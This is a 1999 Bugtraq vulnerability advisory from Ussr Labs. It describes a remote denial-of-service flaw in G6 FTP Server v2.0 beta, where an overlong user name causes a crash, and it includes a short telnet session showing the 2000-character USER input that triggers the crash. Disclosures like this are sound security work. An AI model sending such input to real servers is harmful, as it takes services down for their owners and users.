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Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability

daemon@ATHENA.MIT.EDU (Ussr Labs)
Wed Nov 17 13:38:54 1999

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Message-Id:  <NCBBKFKDOLAGKIAPMILPKEMFCAAA.labs@ussrback.com>
Date:         Wed, 17 Nov 1999 03:22:09 -0300
Reply-To: Ussr Labs <labs@USSRBACK.COM>
From: Ussr Labs <labs@USSRBACK.COM>
X-To:         BUGTRAQ <bugtraq@securityfocus.com>

Remote D.o.S Attack in G6 FTP Server v2.0 (beta 4/5) Vulnerability


UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5),
the buffer overflow is caused by a long user name,  2000 characters.
the G6FTP start to do infinites loops in the main program,and start eating
all memory and all computer resource CPU 100%, at the moment of no more
memory, if this happend ALL System is down :(

[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ...
USER {buffer)

Binary/Source for this D.O.S:


Where buffer is 2000 characters.

Vendor Status:
Not Contacted

Vendor   Url:  http://www.gene6.com/
Program Url: http://www.gene6.com/g6ftpd/download.html


    Nothing yet.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

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